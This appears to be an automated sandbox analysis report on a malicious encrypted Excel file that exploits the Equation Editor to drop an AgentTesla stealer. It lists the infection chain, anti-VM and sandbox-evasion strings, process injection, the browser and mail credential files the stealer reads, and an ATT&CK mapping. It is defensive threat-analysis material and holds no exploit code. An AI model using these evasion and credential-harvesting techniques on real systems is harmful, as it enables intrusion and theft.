Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/12@16/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$0AX4532QWSA.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF47B.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: 0AX4532QWSA.xlsx

Static file information: File size 1385984 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: 0AX4532QWSA.xlsx

Initial sample: OLE indicators vbamacros = False

Source: 0AX4532QWSA.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: new[1].exe.2.dr, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.1310000.1.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xE7B499BF [Sun Mar 8 17:45:35 2093 UTC]

Source: C:\Users\Public\vbc.exe	Code function: 4_2_01147D93 push edi; retf
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01140A9A pushfd ; iretd
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA34FC push FFFFFF8Bh; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA174 push ss; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.9258080582

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX

Source: 0AX4532QWSA.xlsx

Stream path 'EncryptedPackage' entropy: 7.99986275596 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9689

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2360	Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2788	Thread sleep time: -31500s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2800	Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3060	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3060	Thread sleep time: -120000s >= -30000s

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: Fm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMWAREHDGm
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMwareHDGm
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: Fm"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: vmware8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp	Binary or memory string: VMware HDGm

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}

Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\Public\vbc.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Process Injection112	Disable or Modify Tools111	OS Credential Dumping1	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information31	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing12	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	Security Software Discovery211	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol32	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
gammavilla.org	0%	Virustotal		Browse
mail.gammavilla.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
